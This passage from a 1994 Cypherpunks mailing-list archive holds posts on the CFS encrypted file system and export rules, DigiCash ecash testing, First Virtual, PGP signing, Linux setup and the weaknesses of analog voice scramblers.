time or period of inactivity. CFS is being distributed as a research prototype; it is COMPLETELY UNSUPPORTED software. No warranty of any kind is provided. We will not be responsible if the system deletes all your files and emails the cleartext directly to the NSA or your mother. Also, we do not have the resources to port the software to other platforms, although you are welcome to do this yourself. The software was developed under SunOS and BSDI, and there are also unsupported user-contributed ports available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really can't promise to provide any technical support at all, beyond the source code itself. We also maintain a mailing list for CFS users and developers; subscription information is included with the source code. Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and permanent residents. Unfortunately, we cannot make it available for general anonymous ftp or other uncontrolled access, nor can we allow others to do so. Sorry. Legal stuff from the README file: * Copyright (c) 1992, 1993, 1994 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software is subject to United States export controls. You may * not export it, in whole or in part, or cause or allow such export, * through act or omission, without prior authorization from the United * States government and written permission from AT&T. In particular, * you may not make any part of this software available for general or * unrestricted distribution to others, nor may you disclose this software * to persons other than citizens and permanent residents of the United * States and Canada. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. If you would like a copy of the CFS source code, please send email to: cfs at research.att.com DO NOT REPLY DIRECTLY TO THE SENDER OF MESSAGE. You must include a statement that you are in the US or Canada, are a citizen or legal permanent resident of the US or Canada, and have read and understand the license conditions stated above. Also include an email address in a US or Canada-registered domain. The code will be sent to you via email in a uuencoded compressed tarfile. From rfb at lehman.com Fri Dec 2 17:04:07 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 2 Dec 94 17:04:07 PST Subject: Mighty morphing power cypherpunks In-Reply-To: <199412022333.PAA12885@netcom8.netcom.com> Message-ID: <9412030102.AA11319@cfdevx1.lehman.com> From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 1994 15:33:19 -0800 (PST) Rick Busdiecker writes > > From: "James A. Donald" > Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST) > > So autonag every nym to send a public key in. > > Where do you send the autonag message? Do you trust the From: or > Reply-To: fields? It does not matter who the true identity associated with a public key is. My proposal is only that signatures be checked for consistent identity, not true name. Hmmm. I thought that you had also suggesting that this mechanism should ``autonag every nym to send a public key in'' which I thought raised the question of ``Where do you send the autnoag messages?'' Perhaps you meant for the autonag to be a notice attached to the distributed message? Rick From rogaski at phobos.lib.iup.edu Fri Dec 2 17:09:57 1994 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Fri, 2 Dec 94 17:09:57 PST Subject: PGP on a VAX Message-ID: <199412030109.UAA07622@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- I was wondering what the status of getting PGP compiled on a VAX was. The academic machine here is a VAX 6540 running VMS 5.5-1. Of course I avoid it, but I want to spread the good word amongst the IUP student users. Any place I can get documentation? - ----- Doc "I used to think that my brain was the rogaski at phobos.lib.iup.edu best part of my body ... but then I http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." 100,000 lemmings can't be wrong! - Emo Phillips finger fllevta at oak.grove.iup.edu for PGP Public Key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt/FJR0c4/pqJauBAQExfQP/Z1EhLyYw449tTTjYrNNlLRdLA9sA2V+o rpYUgKc0o8yGfEVkERhMH5F40IawXfXkcmVp9Zk+AV8Z7GP2YYpIT8pbFuGSYAYZ HuZXUmYgfmGkzM9uyxV82TyTjh9hQ4Hv7ijwWIPOeROV552WJZYzamJqeBfdi/80 xR13UjkjZs4= =CA+0 -----END PGP SIGNATURE----- From shamrock at netcom.com Fri Dec 2 17:38:54 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 2 Dec 94 17:38:54 PST Subject: Brands excluded from digicash beta Message-ID: PAP wrote: >I just want, in a short message, let you know that there exist some >satisfied ecash testers (the system itself and the support when we >set-up our digishop and our plain customers cyberwallets). > The only thing I could eventually complain about is that I even received >a second (unsollicited) account Id and password to retrieve ecash >software because of a bug in the requests management :-) I have been a beta tester since the days of the very first Ecash clients which would freeze my computer when run ;-) I am very impressed with the latest clients. They work flawlessly. The only thing missing is off-line transfer capability. Since the current beta has a (dimmed) button for this, I don't think we will have to wait much longer. -- Lucky Green PGP encrypted mail preferred. From amanda at intercon.com Fri Dec 2 18:04:52 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 2 Dec 94 18:04:52 PST Subject: The Market for Crypto--A Curmudgeon's View Message-ID: <9412021425.AA28547@amanda.dial.intercon.com> > I disagree here -- I've gotten a couple of jobs where my net > reputation preceded me and was the primary motivator for my getting > an interview. I was also told at one of them to continue posting as I > did because they felt that their reputation was enhanced by mine. Indeed. Every job I've had since part-time consulting in college has been gotten through the net, and with me electronic presentation and reputation a large factor in getting hired. My official title at InterCon is "Software Engineer / Net Goddess", and among my official responsibilities are to competently and professionally represent myself and my employer on the Internet. The whole reason I'm on cypherpunks, in fact, is because we're ramping up on supporting encryption & authentication in our commercial software, and this is where the ideas are. > And "cannot make money on the net"? How do you see this? Much as I > hate the metaphor, I don't make money on the local highways either, > but they're a part of real life. It would also be hard to ship things without highways & airports :). This is why the net is an example of infastructure. InterCon probably makes more money from people who download our demos over the net, or see reviews and recommendations on comp.sys.mac.*, than we do from our traditional printed advertising (and given the quality of a couple of our MacWeek ads, this is a darned good thing :)). > Just because the reputations aren't digital yet, nor is the cash, > doesn't mean that the Net isn't real life. It's as real as nearby > I-94. And a lot more interesting and complex. I agree. And reputations *are* becoming at least partially digital. I've refused to hire people because I've seen them being twits on the net, and I've hired people (and been hired) because I make a generally good net.impression. It even got my picture in Fortune magazine this spring. If that's not at least a start at a digital reputation, I'm not sure what is. Amanda Walker InterCon Systems Corporation From die at pig.die.com Fri Dec 2 18:59:25 1994 From: die at pig.die.com (Dave Emery) Date: Fri, 2 Dec 94 18:59:25 PST Subject: recent voice over data (fwd) Message-ID: <9412030231.AA01795@pig.die.com> Forwarded message: From adam at bwh.harvard.edu Fri Dec 2 19:34:12 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 2 Dec 94 19:34:12 PST Subject: First Virtual? In-Reply-To: <9412022231.AA06560@ch1d157nwk> Message-ID: <199412030333.WAA29210@bwh.harvard.edu> -----BEGIN PGP SIGNED MESSAGE----- I saw a presentation Monday by Nathaniel Borenstien of First Virtual. While I agree that there is a strong need for a good digital cash system, FV is not attempting to fill that niche. FV is a credit card clearing system for the internet. Its current system is designed for small transactions involving information resources. It is not intended to be used for selling physical objects of value. As such, it forces the merchant to assume risks, in that the buyer has two opportunities to turn down a transaction. (When it is mailed to them, and when the credit card statement arrives.) That second opportunity to decline charges also adds to the security of the system. I won't say its good or perfect, but it does add something. FV really isn't taking much risk, or making much profit in their $.29+2% transaction fees. FV plans to make its money in other ways. They simply needed a way to collect credit card numbers to make those other ways work. They decided to make that means of payment generally available, and, while hackable, it is better than credit card numbers. (Those who would suggest PGP encryption should take careful note of how much trouble psuedo-mandating signing of posts is creating here.) The other ways FV plans to make money are providing information services, such as joke of the day. Others were not mentioned, and in fact, when someone asked, Nathaniel was avoiding the question when I said they'd be providing jotd, at which point he said yep. He was pretty admant about not talking about vapor. If you get a chance to hear him, do. It was very interesting, and afterwards, off the record, he might have some interesting things to say. Adam | How can you really compare the proposed DigiCash systems versus FirstVirtual? | One is a 'toy' system for moving credit card numbers around without actually | broadcasting them in the clear, the other is a cryptographically secure | digital cash type system. It's not suprising that FirstVirtual is ready | sooner than DigiCash. However, assuming each system was ready and working as >I'm glad I'm not the only one who thinks FV is a joke. The entire >security of the system rests on the difficulty of intercepting and >forging e-mail. Forging e-mail is dead easy, intercepting isn't much >harder. While the implementors are correct that an online >payment-system will have to be simple to use in order to gain wide >acceptance, sacrificing all security for ease of use is a grave >mistake. It just begging to be ripped off, providing people actually >sell something via FV worth ripping off. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt/nCvTEN6SHa9YpAQHpVwQAxGi7aTp9c8Q10oS8O5vtw/U+CDi2aReb cvBfiJxC159MsBcNIpbf98LU7k1ItxWCGQs4OxvJVhXsRj/XlPqerPl+s3LQfxeB TuTGle9R6wV58yLVF6F4xFJoQU8/zYAb0U9nASrBgiXaIV33NkT65GrgQF6wY9aF GTl3b0DoXIw= =OCqk -----END PGP SIGNATURE----- From rah at shipwright.com Fri Dec 2 21:29:07 1994 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 2 Dec 94 21:29:07 PST Subject: Scalability of Ecash System / Article on Internet Cash available. Message-ID: <199412030528.AAA24023@zork.tiac.net> At 8:33 AM 12/2/94 -0500, Robert Hettinga wrote: >Filched from buyinfo, where they've been talking a lot about e$ lately... Oops. Sorry folks. That's what I get for letting my outbound mail stack up... Call it a prequel to the Brands excluded thread... Sorry again. Long story. Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From ddt at lsd.com Fri Dec 2 21:40:01 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 2 Dec 94 21:40:01 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Subject: ERIK HUGHES: EGOTISTICAL PRICK FWIW, I know Eric and can spell his name properly. From the numerous times I've been in his presence, it's my humble opinion that he's about the furthest thing from the bozo described in this flame that I can imagine. Whoever posted this rudeness is cruelly clue-challenged about Eric's character. From the content of his/her attack, this person should really apologize, but from the puerility of it, I doubt the author is mature enough to admit it. BTW, Eric was and is an early and consistent contributor of quality thinking to this list as far back as I can remember, which is early '92, has donate a lot of time and effort to helping maintain it, and I have no problem with him being photographed or known as a "founder." He's never in any way abused or even preened about it, afaik, and seems appropriately non-egotistical at all times, both in person and in posts. I'm pretty sick of ad hominem attacks like this on the net, but they usualy emanate from sleep-deprived teenagers with no manners who post anonymously, and not from responsible individuals trying to add a voice of humility to an important debate. Laugh it off, Eric, and ignore it (as I know you will). As for the idea of mandatory signatures: on the surface it's a pain and I don't much like it, but then, it does do an important thing in promoting "verifiable" posts. I don't post much material to the list (mostly I learn from you guys), and don't find it particularly onerous. Someone who contributes regularly might find it an inconvenience. Lots of things are way more inconvenient, if you ask me (like applying for an FOIA report). I think it might have the positive side-effect of providing an incentive for people to post meaningful information, and not lots of noise to the list (thereby somewhat diminishing the high volume). What effect does it have on anonymity, though? That could be a serious sticking point: as much as I dislike flames and idiocy from anonymous posters, I will defend their right to post anonymously regardless of how unpleasantly it smells. dave ____________________________________________ "Even the mad scientists called me crazy!" -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLt/zWaHBOF9KrwDlAQFzfAP+MusVHsSaPVq0jzLvqBCUVf8O+JAFbQXZ PKNHai6WXNJqECknifZ9GTYg0tccKY4G+xWjED6oLjeK3V1ds7hIaWNUrFg8Ok6r hH1oPnIMqxY6Iqc0XrgyY+5JnOBVWILA+Iwxy1I0UP+J10Tz8qUY1Q4CL5Ld7yqd FE7JafKUxOw= =Yoe9 -----END PGP SIGNATURE----- From jpb at gate.net Fri Dec 2 21:40:34 1994 From: jpb at gate.net (jpb at gate.net) Date: Fri, 2 Dec 94 21:40:34 PST Subject: Why nothing works [Was: Mandatory sig workaround] In-Reply-To: <9412022332.AA09718@cfdevx1.lehman.com> Message-ID: <199412030541.AAA14055@seminole.gate.net> Re: > You don't need the size, so just buy a 486 and a domain name > (cypherpunks.org?). Then, hire a CP hacker to Linuxize the 486, > slip/ppp it to some provider, and hook-up premail et al. Anyone > selling Linux support contracts yet? > Ironically, about 2 hours before I read this message I decided to go that route - I'm going to be doing some consulting (installing a couple PowerMacs and the software on them) and my buddy who is subcontracting the Mac work to me is willing to pay me in trade so I am getting a 486DX-25 with a 120 meg drive hodgepodged out of his spare parts. I want to run linux on this beast and would like some suggestions from the list - which of the linux CDs do you recommend? I want to have full network services running on it. I need a minimum of POP3/SMTP (my Duo will be grabbing my mail using StarNine's PT-Inet gateway), a web server, NNTP, ftp, all the good stuff. I'm completely unfamiliar with linux other than hearing people rave about it. I do have a moderate amount of Unix experience though, as I used to have a BBS running on an AT&T Unix PC and also administered an AT&T 6300 running Xenix. This was all a long time ago though - both machines were brand new and just introduced on the market when I got my hands on them. Since then, I've just been a user, no root access anywhere. Thanks, Joe Block jpb at gate.net Moderation in temper is always a virtue; moderation in principle is always a vice. -- Thomas Paine From cdodhner at PrimeNet.Com Fri Dec 2 22:04:15 1994 From: cdodhner at PrimeNet.Com (Christian Odhner) Date: Fri, 2 Dec 94 22:04:15 PST Subject: MIT Keysigner CA In-Reply-To: <9412021926.AA19667@toxicwaste.media.mit.edu> Message-ID: On Fri, 2 Dec 1994, Derek Atkins wrote: > everyone to sign everyone else's key. We plan to make the MIT > Keysigner key widely distributed, and ask that everyone trust that key > to sign other keys. It seems strange that people would be expected to trust a key to sign other keys, just because somebody (even Derek, whom I have a measure of respect for) asked them to. I trust a key to be an introducer if and when I am sure that a signature by that key means that the signed key belongs to the identity (be it "real" or a 'nym) it claims to represent. Authentication via Kerbie may or may not indicate this. Such a signature would give some information that I might use to make decisions on whether or not to trust the new key, but it certainly would not be trusted if it was the only signature. Happy Hunting, -Chris. ______________________________________________________________________________ Christian Douglas Odhner | "The NSA can have my secret key when they pry cdodhner at primenet.com | it from my cold, dead, hands... But they shall pgp 2.3 public key by finger | NEVER have the password it's encrypted with!" cypherpunks WOw dCD Traskcom Team Stupid Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11 ------------------------------------------------------------------------------ From cdodhner at news.primenet.com Fri Dec 2 22:20:17 1994 From: cdodhner at news.primenet.com (cdodhner at news.primenet.com) Date: Fri, 2 Dec 94 22:20:17 PST Subject: 6-hour Secure Mobile Voice Message-ID: <199412030625.BAA02517@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I'm sure most of you have seen some of the cheap (relatively speaking) 'phone scramblers' and such sold in local "spy shops" and catalogs. I know as well as most of you that these (almost always analog) scrambler systems even with thier "10,000 code frequencies!" and such are totaly insecure against an attacker with modern resources, but I was wondering if any of these techniques would be good enough to use for real-time applications where the transmitted data is only valuable for 6 hours or less. Such a system would be usefull if you only need security 'right now' and didn't care who knew after a certain (short) timeframe. Comments, advice and product reviews are all welcome from anyone with knowledge or experience in the area. Happy Hunting, -Chris. ______________________________________________________________________________ Christian Douglas Odhner | "The NSA can have my secret key when they pry cdodhner at primenet.com | it from my cold, dead, hands... But they shall pgp 2.3 public key by finger | NEVER have the password it's encrypted with!" cypherpunks WOw dCD Traskcom Team Stupid Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11 - ------------------------------------------------------------------------------ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuAPJioZzwIn1bdtAQFjGAF/e+c8KHSfboM+JuM1GTTuQ76zzJykn5C8 xZTHrpw2/mHDKsDVVLnhb+rbFH9f7w1U =sGdw -----END PGP SIGNATURE----- From moulton at netcom.com Fri Dec 2 22:37:04 1994 From: moulton at netcom.com (Fred C. Moulton) Date: Fri, 2 Dec 94 22:37:04 PST Subject: AA BBS case Message-ID: <199412030636.WAA09724@netcom13.netcom.com> A few months ago there were several posts about the AA BBS case. Here is the info about the sentencing. According to an AP story, Robert and Carleen Thomas were sentenced December 2, 1994 to 37 and 30 months in prison respectively for "transmitting pornography via computer and selling obscene videotapes". The defendents will be ordered to surrender their computer equipment according to U.S. District Judge Julia Gibbons. The defendants will begin their sentences in about two months and will not allowed to remain free during appeal. The Thomases' operated the members-only Amateur Action Bulletin Board System in California. They were tried and convicted in Tennesse. From wcs at anchor.ho.att.com Fri Dec 2 22:39:38 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Fri, 2 Dec 94 22:39:38 PST Subject: using us crypto sw outside usa Message-ID: <9412022104.AA11526@anchor.ho.att.com> > I was wondering what is the legal status for using rsaref ooutside usa. > Is it legal or not? There are three problems - getting a copy, patent, and copyright. Getting a copy of RSAREF means that somebody has to export it, which the US government strongly disapproves of. On the other hand, if you're not a US citizen, and not in the US, and your government doesn't have laws against possessing things that other governments don't want you to have, no problem. Patent - the RSA algorithm patent doesn't apply outside the US, so no problem. Copyright - Most governments do honor U.S. copyrights. Some of the early RSAREF versions said that you may not export it, so there may be copyright problems if you use them outside the US. Newer versions have a warning that the US government doesn't permit export, and recommends talking to a lawyer if this affects you, but doesn't say that you may not do so - so there isn't a problem with permission, and therefore not with copyright. That's nice, because otherwise I would have had to pay somebody outside North America to write a clone. (I had offered anybody on the net outside the US/Canada $100 to do so, but nobody took it, and I now cancel that offer because RSA doesn't forbid overseas use and copies have apparently gotten distributed.) > Also, what is the legal status of RC4 code posted to the net? Uncertain. It was protected by trade secret (not giving anybody copies unless they sign a license contract), but somebody apparently violated their contract and disclosed it anyway. Some places have laws against using information released like that, some don't, some allow the originator of the information to sue. There's also the problem of verifying whether that *really* is RC4. Bill Stewart From pfinerty at seattleu.edu Fri Dec 2 23:12:58 1994 From: pfinerty at seattleu.edu (Patrick J. Finerty Jr.) Date: Fri, 2 Dec 94 23:12:58 PST Subject: PGP on a VAX In-Reply-To: <199412030109.UAA07622@phobos.lib.iup.edu> Message-ID: 6 pjf -- biochem grad student teach me to fish and i'll steal your pole pfinerty at bach.seattleu.edu finerty at msscc.med.utah.edu finger any acct. for pgp key pfinerty at nyx10.cs.du.edu On Fri, 2 Dec 1994, Mark Rogaski wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > I was wondering what the status of getting PGP compiled on a VAX was. > The academic machine here is a VAX 6540 running VMS 5.5-1. > Of course I avoid it, but I want to spread the good word amongst > the IUP student users. Any place I can get documentation? > > > - ----- > Doc "I used to think that my brain was the > rogaski at phobos.lib.iup.edu best part of my body ... but then I > http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." > 100,000 lemmings can't be wrong! - Emo Phillips > > finger fllevta at oak.grove.iup.edu for PGP Public Key > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLt/FJR0c4/pqJauBAQExfQP/Z1EhLyYw449tTTjYrNNlLRdLA9sA2V+o > rpYUgKc0o8yGfEVkERhMH5F40IawXfXkcmVp9Zk+AV8Z7GP2YYpIT8pbFuGSYAYZ > HuZXUmYgfmGkzM9uyxV82TyTjh9hQ4Hv7ijwWIPOeROV552WJZYzamJqeBfdi/80 > xR13UjkjZs4= > =CA+0 > -----END PGP SIGNATURE----- > From die at pig.die.com Sat Dec 3 00:11:14 1994 From: die at pig.die.com (Dave Emery) Date: Sat, 3 Dec 94 00:11:14 PST Subject: 6-hour Secure Mobile Voice In-Reply-To: <199412030625.BAA02517@bb.hks.net> Message-ID: <9412030810.AA05653@pig.die.com> Christian Odhner writes: > > I'm sure most of you have seen some of the cheap (relatively speaking) > 'phone scramblers' and such sold in local "spy shops" and catalogs. I > know as well as most of you that these (almost always analog) scrambler > systems even with thier "10,000 code frequencies!" and such are totaly > insecure against an attacker with modern resources, but I was wondering > if any of these techniques would be good enough to use for real-time > applications where the transmitted data is only valuable for 6 hours or > less. The simplest of these devices is the single band frequency inverter. It operates by mixing incoming voice with a carrier (usually around the top of the voice band) in a double balanced mixer and sending the resulting spectrum down the wire. It is not secure at all against anyone with very simple and widely available equipment - at most it would take such a person a few seconds to find the carrier frequency. And as any ham will tell you, it gets pretty easy to understand inverted or off frequency speech with practice. Most of the really super cheap (under $50 or $100) scramblers are of this toy type. A more complex varient of this is the multiband or split band inverter. This was allegedly used early in World War II for medium security communications. It operates by splitting the voice spectrum into several frequency subbands and swapping those subbands around according to a pattern determined by a key. Masking tones or noise may be added in some of the bands to make understanding harder. Scramblers of this fixed shuffle type can generally be broken easily with DSP techniques. They are not common as current day products. A modern varient of the multiband shuffling scrambler has been used by the US government for low security communications until recently (as the KY-65 Parkhill system). This rolling code scrambler shuffles the voice subband components dynamically several times a second under control of a psuedo random sequence determined by a key and plays some of them forward and some backwards from digital memories. This system requires much cleverer real time DSP signal analysis software to break than the fixed shuffle of world war II stuff, but allegedly some amateurs were able to recover intelligable speech from it without knowing the key sequences. There are lots of commercial versions of this type of scrambler available all over the world - they run from the low hundreds of dollars to the low thousands. Given an attack based on making a best guess as to specific phonemes and phomeme sequences from a particular speaker rather than trying to crack the psuedo-random shuffling sequence, speech from such a device could probably be rendered intelligible in seconds to minutes using modern high perfomance DSPs and fast workstation processors and very clever software, but of course the software to do this is not widely public and the results are probably highly variable and speaker and signal quality dependant. In general, the availablity of high performance processors and better speech recognition algorithms makes this approach more and more possible in shorter and shorter amounts of time. Cracking the psuedo random sequence used in rolling code scramblers is a more classic cryptologic problem and varies greatly in difficulty depending on the particular design. This might take seconds, minutes or many days depending on what generates the sequence and how much "plaintext" can be recovered by signal analysis. Obviously once cracked the speech can be recovered in real time using simple gear. > Such a system would be usefull if you only need security 'right > now' and didn't care who knew after a certain (short) timeframe. > Comments, advice and product reviews are all welcome from anyone with > knowledge or experience in the area. > My advice would be to use one of the digital scrambling technologies. Lots of surplus US government DES equiped HT's are available if radio communications are your purpose... (signature under construction) From crawford at scruznet.com Sat Dec 3 01:04:57 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Sat, 3 Dec 94 01:04:57 PST Subject: Info about Linux Message-ID: <199412030904.BAA12842@scruz.net> Joe Block, jpb at gate.net, sez: > I want to run linux on this beast and would like some suggestions from the > list - which of the linux CDs do you recommend? Hi, I've got Linux. Linux comes in different "distributions" - collections of files that have been integrated into a coherent system. My distribution is sold by Yggdrasil, (408) 261-6630, (800) 261-6630, for $39.95. I like it because it comes with a single boot floppy, and will run off the CDROM once it boots, so you can check it out without even having a hard disk installed. If you've got time, patience, a good, fast net connection and a whole lotta floppies, the slackware distribution (and a couple of others) are available via anonymous FTP from sunsite.unc.edu. There are also several other distributions available on CDROM from various vendors. Check the ads in the Linux Journal (subs at ssc.com for subscription info, (206) 527-3385, or at one of the bookstores I mention further down). If you know about computers, and are willing to put some time into mucking around fixing little petty problems, you can get a very nice system. Mine is a 33 MHz 386 (this is a little too slow for me, but works well), with 8MB of memory (sufficient, should have more), and a nice fast 2.1 GB Fast SCSI-2 Quantum Empire 2100S hard disk. I invested in the hard disk as I felt it would be a lasting value in future computers. I'm skimping on ISA bus cards for the PC as I want to get a PCI bus machine, probably a 100MHz 486, in a few months. You will be able to install Linux, the compiler, basic utilities, and the kernel sources with the disk space you have. You'll want to get more hard disk. I would recommend installing Linux a couple of times, just to see how it goes, before committing to a permanent installation. If you can't get more disk space, you can leave the Yggdrasil CDROM in your drive all the time and run the programs off the CDROM. Slower, but it works OK. I highly recommend the Linux Bible, from Yggdrasil, whatever distribution you get. Read the "How To's" on the various hardware options _before_ purchasing any new hardware. There are many supported peripherals, but I understand many of them work only marginally. For example, the UART chips generally used in PC serial ports are quite inadequate for driving an internet connection, as your machine will spend all its time servicing one-interrupt-per-character interrupts, but a serial card with a 16 character buffer that works just fine is available quite cheaply. You can FTP the bible from ftp.yggdrasil.com, but you'll want the hardcopy as it is over 1000 pages. The cover price is less than the cost of the toner cartridge you'll burn printing it. The How To's, the Linux MetaFAQ and lots of other info are on rtfm.mit.edu and sunsite.unc.edu. I've used lots of Unix systems, from System V on a 286, to Sun workstations, Vaxes, and even a Cray running Unicos, and I can say that Linux is equal to or better than any of them as far as what the OS can do, in some respects much much better. (I removed SCO ODT from my hard disk to install Linux. I might reinstall it on a second drive just to test my programs). There are still lots of glitches, but you have the source code, and access to comp.os.linux.help, where everyone else has the source code too - it beats the Hell out of Sun's technical support, IMHO. With about two thousand dollars more hardware, I would have a machine I would enjoy as much as a fifteen thousand dollar Sun, with the source code to boot ;-). One thing I highly recommend: if you or anyone you know is planning on setting up a full-time Internet connection, use a Linux box as a router, running PPP or SLIP out a modem, and ethernet on your LAN. Even a slow 386 has enough performance to service a SLIP connection at 28 kbaud, and since you have the source code to the kernel and all the internet server software, you can implement a firewall any way you like. I'm contemplating preparing my own distribution, which would be a very stripped-down Linux kernel and OS utility set, on a small number of bootable CDROMs, to allow one to install a firewall router on a small hard disk. Don't hold your breath waiting for this though. There is a security enhancement I mean to try once I've set up my own full-time router (watch for http://crawford.sc.scruznet.com, in about two weeks, maybe a month). I want to remove the ability to set the setuid bit from the kernel. Trying to set the setuid bit on a file will abort the process. Of course you can't install system software if this is done - but I could boot off a different kernel to do maintenance. This would prevent the problem of a hacker breaking in and dropping a program in my path that the hacker intends me to accidentally execute as root. There would be ways to set the bit (writing into the raw disk special file) but it would require more effort to accomplish. Crypto enthusiasts in the US and Canada can get Matt Blaze's CFS - I just got the sources, and haven't tried them out yet, but I understand there is already a Linux port. Now here's a puzzler for you. The People's Republic of China is working very hard to modernize, but still lacks capital for much hardware investment, so you see banks using 386 boxes to run an entire bank, if the bank uses a computer at all. A couple of years ago I heard that the PRC signed a deal with some big Unix vendor to supply the nation with computers and software, for many millions of dollars. Why don't they use Linux? The PRC is certainly not lacking for educated people who could do all the development they need. You can get Linux books and CDROM's from the Computer Literacy bookstore on North First Street in San Jose, and Powell's technical books in Portland Oregon. Powell's does mail order, and has a Web page which allows you to search their inventory for books. They've got lots of crypto books too, 2600 Magazine and lots of engineering books. I think the URL is http:technical.powells.portland.or.us. Development versions of Linux are available for Macintoshes and MIPS machines. If I were to use a Linux Laptop, I would put it on a Macintosh Powerbook. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From usura at xs4all.nl Sat Dec 3 01:39:05 1994 From: usura at xs4all.nl (usura at xs4all.nl) Date: Sat, 3 Dec 94 01:39:05 PST Subject: Kudos Message-ID: <199412030943.EAA04190@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Thanks and congratulations to Todd for a job well done with the CP signing service and Raph for his excellent work with premail. An appreciative lurker/learner - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuA9wioZzwIn1bdtAQFXnwGAitqcooxfEeABifXLhmxmRAQKlM90Gm6K Y2vmZi3kjSYWpDMYQNkID+HXYTeps30Q =oN3X -----END PGP SIGNATURE----- From bigmac at digicash.com Sat Dec 3 02:01:47 1994 From: bigmac at digicash.com (Marcel van der Peijl) Date: Sat, 3 Dec 94 02:01:47 PST Subject: ecash trial issues explained Message-ID: <199412031001.LAA14509@digicash.com> (This message is not an official DigiCash message but represents my personal opinions) Here are some answers to issues recently discussed on the cypherpunks list. I do not read this list as that takes too much time, I only read what people that do read forward from the list to me. Stefan Brands is not excluded in any way from the trial. His request was never received at DigiCash. Several others in the CWI crypto group (all that applied) did receive their accounts. There is no 'political boycot'. The ecash software allows for multiple payment protocols to co-exist. Besides the currently implemented protocol and the Stefan Brands system there are more possible systems. We are not fixed in any way to the current protocol. Besides the patent issues, it is not clear which protocol is better. Last time I checked (a week ago, I am currently on the road) there well over 500 or 600 active ecash accounts. But there are another 1000 accounts waiting, and new requests coming in between 10 and 100 per day. As the mail that was sent out explains, the trial is rolled out in phases. The result is that the software is more 'robust' before large quantities of users run into the same problem, in the sense that it works on any OS in any configuration with any network hookup, no matter how 'bad'. (We are not in the business of being a 'network helpdesk'.) Potential ecash vendors have had priorities in being assigned ecash accounts. But they are also 'harrassed' for actually doing what they promise to do. Because we can not support a 24 hour staff and we want to keep response time low, people in time zones close to ours (GMT+1) have been issued accounts first. At the moment we are confident we can scale up the trial. I promise you it will not be several more months before everyone can join the trial. People that run into ecash problems are almost always helped or replied to the same day, and often within the hour. However, some people send their problems to the wrong address, such as the generic ecash info address or the feedback address, which may result in not getting an answer for several days. If mails go to ecash-bugs at digicash.com, the developers involved immediately see the mail and help out, provided they are technical mails and have sufficient information to actually be able to give help. As you can imagine, problems described as 'it does not work for me' without any extra information take a few mails back and forth, and tedious searching in log files, before the actual problem is clear. You can understand the anonimity of the system does not make that easier. People that compare FV or other systems and ecash are really comparing apples and pears. From a business view they may look the same, but how they operate is totally different. Ecash is the only system that allows for full anonimity on the buyers side using public key technology. We strongly believe it should not be possible for anyone to see all individual transactions a person makes. The business model used is also different. We do not charge users or shops a fee to use the ecash system, and provide the ecash software (both client and shop) for free, and give support for free. Unfortunately this does mean we are not getting large sums of money to spend on slick marketing schemes. Just a final remark before totally boring you to death: Some of the people that post unfriendly messages on mailing lists, like Stefan Brands, do so before actually mailing to us. Please give us a fair chance! Marcel van der Peijl Ecash technical project leader DigiCash bv http://www.digicash.com/ From jya at pipeline.com Sat Dec 3 06:59:30 1994 From: jya at pipeline.com (jya at pipeline.com) Date: Sat, 3 Dec 94 06:59:30 PST Subject: Info about Linux Message-ID: <199412031504.KAA06464@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Responding to msg by crawford at scruznet.com (Michael D. Crawford) on Sat, 3 Dec 1:4 AM Thanks for this Linux info. FWIW, PC Mag's John Dvorak plugs Linux and Yggdrasil in the December 20 issue. He says, "there's no excuse not to have Linux as a primary or alternative operating system ... highly recommended, bargain of the year." - --- [This message has been signed by an 